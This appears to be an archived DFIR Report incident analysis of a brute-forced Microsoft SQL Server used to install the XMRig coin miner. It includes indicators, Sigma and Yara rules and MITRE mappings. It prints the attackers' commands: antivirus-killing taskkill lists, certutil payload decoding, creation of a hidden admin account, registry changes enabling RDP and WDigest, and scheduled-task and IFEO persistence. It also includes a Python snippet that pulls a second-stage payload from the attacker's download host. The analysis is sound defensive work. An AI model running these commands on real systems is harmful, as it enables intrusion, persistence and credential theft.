{
	"id": "4dc6ff71-5795-4c35-8a5f-3fd2c6ed7e4e",
	"created_at": "2026-04-06T00:21:03.891249Z",
	"updated_at": "2026-04-10T03:20:04.570476Z",
	"deleted_at": null,
	"sha1_hash": "776f531892b1f77d433cc9d50ffaf806bf466e11",
	"title": "SELECT XMRig FROM SQLServer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4070961,
	"plain_text": "SELECT XMRig FROM SQLServer\r\nBy editor\r\nPublished: 2022-07-11 · Archived: 2026-04-05 12:39:25 UTC\r\nIn March 2022, we observed an intrusion on a public-facing Microsoft SQL Server. The end goal of this intrusion was to\r\ndeploy a coin miner. Although deploying a coin miner on a vulnerable server after successful exploitation is a common\r\nobjective for threat actors, this intrusion was slightly different and therefore more interesting.\r\nUS CERT recently published a malware analysis report related to XMRig coin miner on 23rd June 2022\r\n(https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-174a) and a security tip for defending against this threat\r\n(https://www.cisa.gov/uscert/ncas/tips/ST18-002).\r\nSummary\r\nOver the month of March, we observed a cluster of activity targeting MSSQL servers. The activity started via password\r\nbrute force attempts for the MSSQL SA account. These brute force attempts were observed repeatedly over the month.\r\nExamples included one cluster of 24,000 failed attempts from the same source, over a 27 hour effort, before they finally\r\nmanaged to guess the password. After having the correct credentials in their possession, the attackers then spawned a\r\ncommand shell via xp_cmdshell. According to Microsoft documentation, xp_cmdshell spawns a Windows command shell\r\nand passes in a string for execution.\r\nUsing xp_cmdshell, the threat actors were able to execute any command against the compromised server. They attempted to\r\nkill a bunch of AV programs by using taskkill.exe. The threat actors then wrote multiple commands to a batch file by using\r\necho and redirecting the strings to a file named 1.bat. After the batch file was written they then proceeded to perform the\r\nsame action echoing data into a file named bigfile.txt. After they finished writing to that file, they ran certutil to decode the\r\nbase64 data into an executable file. 
This executable was a privilege escalation tool that was used to execute the batch file to\r\nmake sure it ran with high enough permissions. They then executed the batch script. The commands included adding\r\nnew users to the local administrators group, enabling RDP, enabling WDigest, and hiding the newly created admin accounts\r\nusing the registry.\r\nOnce the threat actors had established persistence on the compromised host, they moved to their final objective, which was\r\nto install and run the XMRig miner. To do that, they dropped a Binary Managed Object Format (BMOF) file along with the miner\r\nitself. The threat actors used mofcomp.exe to decompile the BMOF binary and register a malicious class in the\r\nWMI repository. The event consumer of the newly created classes included a VBE script responsible for setting up and\r\nexecuting the XMRig miner with the correct settings.\r\nNo other activity beyond the mining was observed before the threat actors were evicted.\r\nServices\r\nWe offer multiple services including a Threat Feed service that tracks Command and Control frameworks such as Cobalt\r\nStrike, Sliver, BumbleBee, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be\r\nfound here.\r\nArtifacts for this case are limited due to the environment. A few log sources are available for this case under our Security\r\nResearcher and Organization services.\r\nAnalysis and reporting completed by @_pete_0 and @kostastsale\r\nInitial Access\r\nThe initial access took place via a brute-force attack, where the threat actors mainly targeted the System Admin (SA)\r\naccount.\r\nDuring the intrusion, we could see SQL Server event ID 18456 Failure Audit events in the Windows application logs. 
We\r\nwitnessed more than 24,000 attempts from the same source before the threat actors successfully guessed the username and\r\npassword for the open SQL database.\r\nExample of the failed brute force attempts:\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 1 of 14\n\nFollowed by eventual successful logins.\r\nIt is likely that multiple successful logins were observed due to the automated access script that the threat actor was using.\r\nExecution\r\nIn the next attack stage, the threat actors established a cmd shell via the Extended SQL Stored Procedure xp_cmdshell. This\r\nprocedure allows you to issue operating system commands directly to the Windows command shell using T-SQL code. An\r\nexample of command execution following a successful authentication to the SQL database using xp_cmdshell:\r\n-- Executing the 'whoami' command on the remote host\r\nEXEC xp_cmdshell 'whoami'\r\nAt a high level, the overall execution events can be depicted in the below diagram:\r\nIf we look into the Windows Application logs, SQL Server event ID 15457 captures this as an\r\n‘xp_cmdshell’ event. Additionally, the SQL Server audit collection also captures similar events. The first commands\r\nexecuted by the threat actors included using taskkill against various anti-virus software.\r\ntaskkill /f /im egui.exe\r\ntaskkill /f /im QQPCTray.exe\r\ntaskkill /f /im SafeDogGuardCenter.exe\r\ntaskkill /f /im 360safe.exe\r\ntaskkill /f /im net1895.exe\r\ntaskkill /f /im ekrn.exe\r\ntaskkill /f /im 360rp.exe\r\ntaskkill /f /im QQPCMgr.exe\r\ntaskkill /f /im SafeDogServerUI.exe\r\ntaskkill /f /im SafeDogSiteIIS.exe\r\nThe threat actors also favored the execution of batch scripts on the compromised host. 
They used xp_cmdshell to write a\r\nbatch script (1.bat) to disk by redirecting strings to the file using echo commands.\r\nA second set of commands was also echoed into a file named bigfile.txt.\r\nOnce complete, certutil was used to decode the base64 text and create an executable file.\r\n\"cmd.exe\" /c certutil -decode %USERPROFILE%\\AppData\\bigfile.txt %USERPROFILE%\\AppData\\bigfile.exe\r\nThis executable was then used to execute the 1.bat batch file.\r\n\"cmd.exe\" /c %USERPROFILE%\\AppData\\bigfile.exe -i -c %USERPROFILE%\\AppData\\1.bat\r\nThe hash of the file that was written matches what appears to be a privilege escalation tool, as seen in the hits from the\r\nTHOR scanner:\r\nhttps://www.virustotal.com/gui/file/b67dfd4a818d10a017a4d32386cf4cd2a3974636bed04f27e45de6ada86a56d2/community\r\nWe believe this tool may be a variation of NetworkServiceExploit.exe, which attempts to use NetworkService for privilege\r\nescalation.\r\nAdditionally, we noticed the attackers dropping a file named “xitmf”. Looking into the file’s content, we noticed that the\r\nheader began with “FOMB”. When flipping the header, it spells BMOF, which indicates a Binary Managed Object Format\r\nfile. BMOF is a compiled version of a Managed Object Format (MOF) file. As per Microsoft’s official documentation:\r\n“Managed Object Format (MOF) is the language used to describe Common Information Model (CIM) classes.”\r\nMOF files are compiled using the Windows compiler tool mofcomp. Mofcomp.exe is also used to execute scripts by parsing\r\nthe MOF statements and creating new classes as part of the WMI repository. 
\r\ncmd.exe /c mofcomp.exe C:\\Windows\\SERVIC~1\\MSSQL$~1\\AppData\\Local\\Temp\\xitmf\r\nUsing the same mofcomp utility, it is possible to decompile the BMOF to extract the script, using this command provided by\r\nMatt Graeber:\r\nThreat actors also transferred a Visual Basic Encoded (VBE) file that is executed on the host using cscript.exe. Once run, the\r\nscript would set up and execute the XMRig CoinMiner. During the execution, the password 579562847 is provided as an\r\nargument.\r\ncscript.exe /b /e:VBScript.Encode C:\\Windows\\SERVIC~1\\MSSQL$~1\\AppData\\Local\\Temp\\xit 579562847\r\nWe recognize that this is a VBE file from the file signature (“magic bytes”) in the first four bytes of the file.\r\nWe can decode the VBE file using CyberChef:\r\nThe script has several functions: one controls the coin miner software on the host, and two configure parameters\r\nsuch as user-agent strings through randomization:\r\nCommand interactions are done via WMI, for process discovery:\r\nProcess creation:\r\nIn the code, we observed further attempts to obfuscate sensitive attributable values:\r\nUsing the original password and some further de-obfuscation, we could decipher the values; in this case, the email address\r\nis:\r\nbj87670@gmail.com\r\nSome other deciphered values relate to coin mining pools:\r\ncrypto-pool[.]fr\r\nminergate[.]com\r\nWe also observed another dropper. Threat actors transferred the file ex.exe. 
Ex.exe is an UnRAR application that they used to\r\nextract more malicious artifacts:\r\nCommandLine:\r\nex.exe x -prootBRUCE -y C:\\Windows\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\istx64f.rar C:\\Windows\\\u003cREDACTED\u003e\\AppData\\Loc\r\nFiles extracted:\r\nWinRing0x64.sys - XMRig cryptominer Windows driver\r\nsmss.exe - XMRig coin miner\r\nkit.bat\r\nThe kit.bat script included instructions for executing the miner as well as for creating persistence via a scheduled task. See the\r\ncontents of the script below:\r\n@echo off\r\nset usr=jood.06.10\r\nset app=smss.exe\r\ncd /d \"%~dps0\"\r\nif \"%1\"==\"-s\" (\r\nif EXIST %~dps0smss.exe start /min %~dps0smss.exe -c %usr%\r\nexit\r\nif EXIST %~dps0smss.exe start /min %~dps0smss.exe -c %usr%\r\nschtasks /delete /tn ngm /f\r\nschtasks /delete /tn cell /f\r\nschtasks /create /tn ngm /tr \"%~dps0kit.bat -s\" /sc hourly /ru \"\"\r\nschtasks /run /tn ngm\r\nexit\r\nSomething to note regarding the kit.bat script is that its contents were the topic of discussion in a\r\nChinese forum back in 2018.\r\nLink: hxxp://www[.]bathome[.]net/thread-48526-1-1.html\r\nPersistence\r\nThe threat actors wrote a batch script (1.bat) that contained commands for establishing persistence on the compromised host.\r\nWe see the creation of a new account and the addition of this account to the local administrators group.\r\nNET USER Adminv$ !67hCS14ORVg /ADD /expires:never\r\nNET LOCALGROUP Administrators /ADD Adminv$\r\nThey also made remote RDP connections possible by changing the fDenyTSConnections and UserAuthentication values to\r\n0.\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWO\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-TCP\" /v UserAuthe\r\nNET USER Adminv$ !67hCS14ORVg /ADD /expires:never\r\nNET 
LOCALGROUP Administrators /ADD Adminv$\r\nREG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v Adminv$ /t RE\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LocalAccountTokenFil\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWO\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-TCP\" /v UserAuthe\r\nNET LOCALGROUP Administrators /ADD Adminv$\r\nNET LOCALGROUP Administratoren /ADD Adminv$\r\nNET LOCALGROUP Administrateurs /ADD Adminv$\r\nNET LOCALGROUP Administratorzy /ADD Adminv$\r\nNET LOCALGROUP Administradores /ADD Adminv$\r\nFull Contents of 1.bat\r\nWe later see the threat actors writing another batch file to disk and executing it. The kit.bat script contained a scheduled task\r\nthat would run kit.bat itself on an hourly basis.\r\nschtasks /create /tn ngm /tr \"%~dps0kit.bat -s\" /sc hourly /ru \"\"\r\nschtasks /run /tn ngm\r\nAs explained in the execution tactic above, the threat actors installed a malicious WMI event subscription by including a\r\nVBScript that would execute on the compromised host. This was used as a method of persistence. 
The VBScript would\r\nexecute every day at 23:00 of the host's local time.\r\nDecompiled .mof file containing the WMI event subscription.\r\nBreaking down the above screenshot, the WMI event subscription contains the below malicious EventConsumer and\r\nEventFilter classes:\r\nEvent Consumer:\r\nClass Name: ASEventConsumerdr\r\nContent: VBScript\r\nEvent Filter:\r\nName: EFNMdr (randomly named)\r\nTrigger: Every day at 23:00 local time\r\nLooking into the VBScript, we notice that it is reaching out to the domain mymst007[.]info on port 4000 to download one\r\nmore file and save it as a temp file.\r\n1. WMI EventConsumer VBScript:\r\nWe used the below Python code to emulate the VBScript and download the next stage payload:\r\nimport requests\r\n\r\nchars = []\r\ntext = \"\"\r\n# Fetch the comma-separated list of integers served by the download host\r\nresponse = requests.get(\"http://mst2.mymst007.info:4000/ex?e=1\")\r\nbody = response.text.split(',')\r\n# Each value is a character code offset by 2; undo the offset\r\nfor i in body:\r\n    chars.append(int(i) - 2)\r\n# Rebuild the decoded second stage from the character codes\r\nfor i in chars:\r\n    text = text + chr(i)\r\nprint(text)\r\n1. Second stage payload downloaded and executed:\r\nThe final method of persistence we observed was the addition of an entry into the Image File Execution Options (IFEO)\r\nregistry key. By changing the Debugger value to a different executable, an attacker used IFEO to launch a program other\r\nthan the intended one. 
In this case, threat actors modified the below registry key to launch the miner executable (smss.exe)\r\ninstead of the svchost.exe binary.\r\n\"cmd.exe\" /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\smss.exe\" /f /v Debu\r\nPrivilege Escalation\r\nThe threat actors dropped a file named bigfile.txt, which they converted to bigfile.exe using certutil, and which we believe is a\r\nvariation of NetworkServiceExploit.exe, as seen below.\r\nThis was used in this intrusion to run the batch file with the following command:\r\n\"cmd.exe\" /c %USERPROFILE%\\AppData\\bigfile.exe -i -c %USERPROFILE%\\AppData\\1.bat\r\nDefense Evasion\r\nThe threat actors attempted to kill antivirus tasks that could be running on the host. The commands targeted the below\r\nprocesses:\r\nQQPCTray.exe\r\nQQPCRTP.exe\r\nQQPCMgr.exe\r\nkavsvc.exe\r\nalg.exe\r\nAVP.exe\r\nSafeDogGuardCenter.exe\r\nSafeDogSiteIIS.exe\r\nSafeDogUpdateCenter.exe\r\nSafeDogServerUI.exe\r\nkxescore.exe\r\nkxetray.exe\r\n360safe.exe\r\n360sd.exe\r\n360rp.exe\r\n360rps.exe\r\n360tray.exe\r\nZhuDongFangYu.exe\r\nThe privilege escalation tool the threat actors brought with them was written as a text file and then decoded using certutil\r\ninto a binary file.\r\n\"cmd.exe\" /c certutil -decode %USERPROFILE%\\AppData\\bigfile.txt %USERPROFILE%\\AppData\\bigfile.exe\r\nAs we can see from the contents of the 1.bat script, the threat actors added a new local administrator user and then\r\nhid the user account by adding it to the registry under “Special Accounts”.\r\nREG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v Adminv$ /t REG_DWORD /d\r\nThrough the execution of the initial batch script, 1.bat, they also disabled the User Account 
Control (UAC) remote restriction\r\nby setting the registry key value to “1”.\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LocalAccountTokenFilterPolicy /\r\nThreat actors also enabled WDigest.\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\r\nAfter many files were added to the system, the threat actors included commands to remove them once their execution was\r\nfinished.\r\n\"cmd.exe\" /c DEL %USERPROFILE%\\AppData\\1.bat\r\n\"cmd.exe\" /c DEL %USERPROFILE%\\AppData\\bigfile.txt\r\n\"cmd.exe\" /c DEL %USERPROFILE%\\AppData\\bigfile.exe\r\nCredential Access\r\nDuring the initial access, credentials were obtained via a brute-force attack against the exposed MSSQL server. No other\r\ncredential access was observed during this intrusion, although the threat actors did enable WDigest to make later credential\r\naccess easier.\r\nCommand and Control\r\nWe observed that the domain mymst007[.]info is used to download further payloads. The domain was created five years ago.\r\nWe have seen similar reports that make mention of the same infrastructure. Attacks associated with this domain include the\r\nsame or similar tactics, techniques and procedures (TTPs).\r\nConnections related to the domain – mymst007[.]info\r\nImpact\r\nThe impact was concentrated on this one host. We did not see any further activity in this case. The compromised host had\r\nthe XMRig miner installed and running. 
The miner was also connecting to cryptomining pools such as minergate[.]com.\r\nIndicators\r\nFile\r\nWinRing0x64.sys\r\nex.exe\r\nkit.bat\r\nsmss.exe\r\nxit\r\nxitmf\r\nNetwork\r\nminergate[.]com\r\nmymst007[.]info\r\nbj87670@gmail.com\r\nDetections\r\nSigma\r\nCustom Sigma rules\r\nSuspicious Commands by SQL Server\r\nMOFComp Execution\r\nHiding Local User Accounts\r\nSigmaHQ\r\nSystem File Execution Location Anomaly –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml\r\nSuspicious Shells Spawn by SQL Server –\r\nhttps://github.com/SigmaHQ/sigma/edit/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml\r\nSuspicious Execution of Taskkill –\r\nhttps://github.com/SigmaHQ/sigma/blob/04a3dfeb019fb326a2a411e87049c4a59d81bfb5/rules/windows/process_creation/proc_creation_win_susp_taskki\r\nNet.exe User Account Creation 
–\r\nhttps://github.com/SigmaHQ/sigma/blob/8bb3379b6807610d61d29db1d76f5af4840b8208/rules/windows/process_creation/proc_creation_win_net_user_a\r\nWdigest Enable UseLogonCredential –\r\nhttps://github.com/SigmaHQ/sigma/blob/b4cb047ae720b37b11f8506de7965dc29d5920be/rules/windows/registry/registry_set/registry_set_wdigest_enabl\r\nDNS Events Related To Mining Pools –\r\nhttps://github.com/SigmaHQ/sigma/blob/578c838277fdba88704ff3fed3268e87bd7277e0/rules/network/zeek/zeek_dns_mining_pools.yml\r\nYara\r\nrule miner_batch {\r\n meta:\r\n description = \"file kit.bat\"\r\n author = \"TheDFIRReport\"\r\n reference = \"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\"\r\n date = \"2022/07/10\"\r\n hash1 = \"4905b7776810dc60e710af96a7e54420aaa15467ef5909b260d9a9bc46911186\"\n strings:\n $a1 = \"%~dps0\" fullword ascii\n $a2 = \"set app\" fullword ascii\n $a3 = \"cd /d \\\"%~dps0\\\"\" fullword ascii\n $a4 = \"set usr=jood\" fullword ascii\n $s1 = \"schtasks /run\" fullword ascii\n $s2 = \"schtasks /delete\" fullword ascii\n $a5 = \"if \\\"%1\\\"==\\\"-s\\\" (\" fullword ascii\n condition:\n uint16(0) == 0xfeff and filesize \u003c 1KB and\n 3 of ($a*) and 1 of ($s*)\n}\nrule file_ex_exe {\n meta:\n description = \"files - file ex.exe.bin\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\"\n date = \"2022/07/10\"\n hash1 = \"428d06c889b17d5f95f9df952fc13b1cdd8ef520c51e2abff2f9192aa78a4b24\"\n strings:\n $s1 = \"d:\\\\Projects\\\\WinRAR\\\\rar\\\\build\\\\unrar32\\\\Release\\\\UnRAR.pdb\" fullword ascii\n $s2 = \"rar.log\" fullword wide\n $s3 = \" \" fullword ascii\n $s4 = \" processorArchitecture=\\\"*\\\"\" fullword ascii\n $s5 = \"%c%c%c%c%c%c%c\" fullword wide /* reversed goodware string 'c%c%c%c%c%c%c%' */\n $s6 = \" version=\\\"1.0.0.0\\\"\" fullword ascii\n $s7 = \"%12ls: RAR %ls(v%d) -m%d -md=%d%s\" 
fullword wide\n $s8 = \" hp[password] \" fullword wide\n $s9 = \" %s - \" fullword wide\n $s10 = \"yyyymmddhhmmss\" fullword wide\n $s11 = \"-------- %2d %s %d, \" fullword wide\n $s12 = \" Type Descriptor'\" fullword ascii\n $s13 = \"\\\\$\\\\3|$4\" fullword ascii /* hex encoded string '4' */\n $s14 = \" processorArchitecture=\\\"*\\\"\" fullword ascii\n $s15 = \" constructor or from DllMain.\" fullword ascii\n $s16 = \"----------- --------- -------- ----- ----\" fullword wide\n $s17 = \"----------- --------- -------- ----- -------- ----- -------- ----\" fullword wide\n $s18 = \"%-20s - \" fullword wide\n $s19 = \" publicKeyToken=\\\"6595b64144ccf1df\\\"\" fullword ascii\n $s20 = \" version=\\\"6.0.0.0\\\"\" fullword ascii\n condition:\n uint16(0) == 0x5a4d and filesize \u003c 900KB and\n 8 of them\n}\nrule smss_exe {\n meta:\n description = \"files - file smss.exe.bin\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\"\n date = \"2022/07/10\"\n hash1 = \"d3c3f529a09203a839b41cd461cc561494b432d810041d71d41a66ee7d285d69\"\n strings:\n $s1 = \"mCFoCRYPT32.dll\" fullword ascii\n $s2 = \"gPSAPI.DLL\" fullword ascii\n $s3 = \"www.STAR.com\" fullword wide\n $s4 = \"4;#pMVkWTSAPI32.dll\" fullword ascii\n $s5 = \" \" fullword ascii\n $s6 = \"dYDT.Gtm\" fullword ascii\n $s7 = \"|PgGeT~^\" fullword ascii\n $s8 = \"* IiJ)\" fullword ascii\n $s9 = \"{DllB8qq\" fullword ascii\n $s10 = \"tfaqbjk\" fullword ascii\n $s11 = \"nrvgzgl\" fullword ascii\n $s12 = \" \" fullword ascii\n $s13 = \"5n:\\\\Tk\" fullword ascii\n $s14 = \" \" fullword ascii\n $s15 = \"HHp.JOW\" fullword ascii\r\n $s16 = \" \u003c!--The ID below indicates application support for Windows 8 --\u003e\" fullword ascii\r\n $s17 = \" \u003c!--The ID below indicates application support for Windows 7 --\u003e\" fullword ascii\r\n $s18 = \"Wr:\\\\D;\" fullword ascii\r\n $s19 
= \"px:\\\"M$\" fullword ascii\r\n $s20 = \" \u003ctrustInfo xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 23000KB and\r\n 8 of them\r\n}\r\nrule WinRing0x64_sys {\r\n meta:\r\n description = \"files - file WinRing0x64.sys.bin\"\r\n author = \"TheDFIRReport\"\r\n reference = \"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\"\r\n date = \"2022/07/10\"\r\n hash1 = \"11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5\"\r\n strings:\r\n $s1 = \"d:\\\\hotproject\\\\winring0\\\\source\\\\dll\\\\sys\\\\lib\\\\amd64\\\\WinRing0.pdb\" fullword ascii\r\n $s2 = \"WinRing0.sys\" fullword wide\r\n $s3 = \"timestampinfo@globalsign.com0\" fullword ascii\r\n $s4 = \"\\\"GlobalSign Time Stamping Authority1+0)\" fullword ascii\r\n $s5 = \"\\\\DosDevices\\\\WinRing0_1_2_0\" fullword wide\r\n $s6 = \"OpenLibSys.org\" fullword wide\r\n $s7 = \".http://crl.globalsign.net/RootSignPartners.crl0\" fullword ascii\r\n $s8 = \"Copyright (C) 2007-2008 OpenLibSys.org. 
All rights reserved.\" fullword wide\r\n $s9 = \"1.2.0.5\" fullword wide\r\n $s10 = \" Microsoft Code Verification Root0\" fullword ascii\r\n $s11 = \"\\\\Device\\\\WinRing0_1_2_0\" fullword wide\r\n $s12 = \"WinRing0\" fullword wide\r\n $s13 = \"hiyohiyo@crystalmark.info0\" fullword ascii\r\n $s14 = \"GlobalSign1+0)\" fullword ascii\r\n $s15 = \"Noriyuki MIYAZAKI1(0\u0026\" fullword ascii\r\n $s16 = \"The modified BSD license\" fullword wide\r\n $s17 = \"RootSign Partners CA1\" fullword ascii\r\n $s18 = \"\\\\/.gJ\u0026\" fullword ascii\r\n $s19 = \"14012709\" ascii\r\n $s20 = \"140127110000Z0q1(0\u0026\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 40KB and\r\n 8 of them\r\n}\r\nMITRE\r\nT1053.005 - Scheduled Task/Job: Scheduled Task\r\nT1136.001 - Create Account: Local Account\r\nT1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription\r\nT1564.002 - Hide Artifacts: Hidden Users\r\nT1059.003 - Command and Scripting Interpreter: Windows Command Shell\r\nT1027.004 - Obfuscated Files or Information: Compile After Delivery\r\nT1110.001 - Brute Force: Password Guessing\r\nT1070.004 - Indicator Removal on Host: File Deletion\r\nT1562.001 - Impair Defenses: Disable or Modify Tools\r\nT1546.012 - Event Triggered Execution: Image File Execution Options Injection\r\nT1140 - Deobfuscate/Decode Files or Information\r\nT1112 - Modify Registry\r\nT1078 - Valid Accounts\r\nT1134.001 - Token Impersonation/Theft\r\nInternal case #12780\r\nSource: https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/"
	],
	"report_names": [
		"select-xmrig-from-sqlserver"
	],
	"threat_actors": [],
	"ts_created_at": 1775434863,
	"ts_updated_at": 1775791204,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/776f531892b1f77d433cc9d50ffaf806bf466e11.pdf",
		"text": "https://archive.orkl.eu/776f531892b1f77d433cc9d50ffaf806bf466e11.txt",
		"img": "https://archive.orkl.eu/776f531892b1f77d433cc9d50ffaf806bf466e11.jpg"
	}
}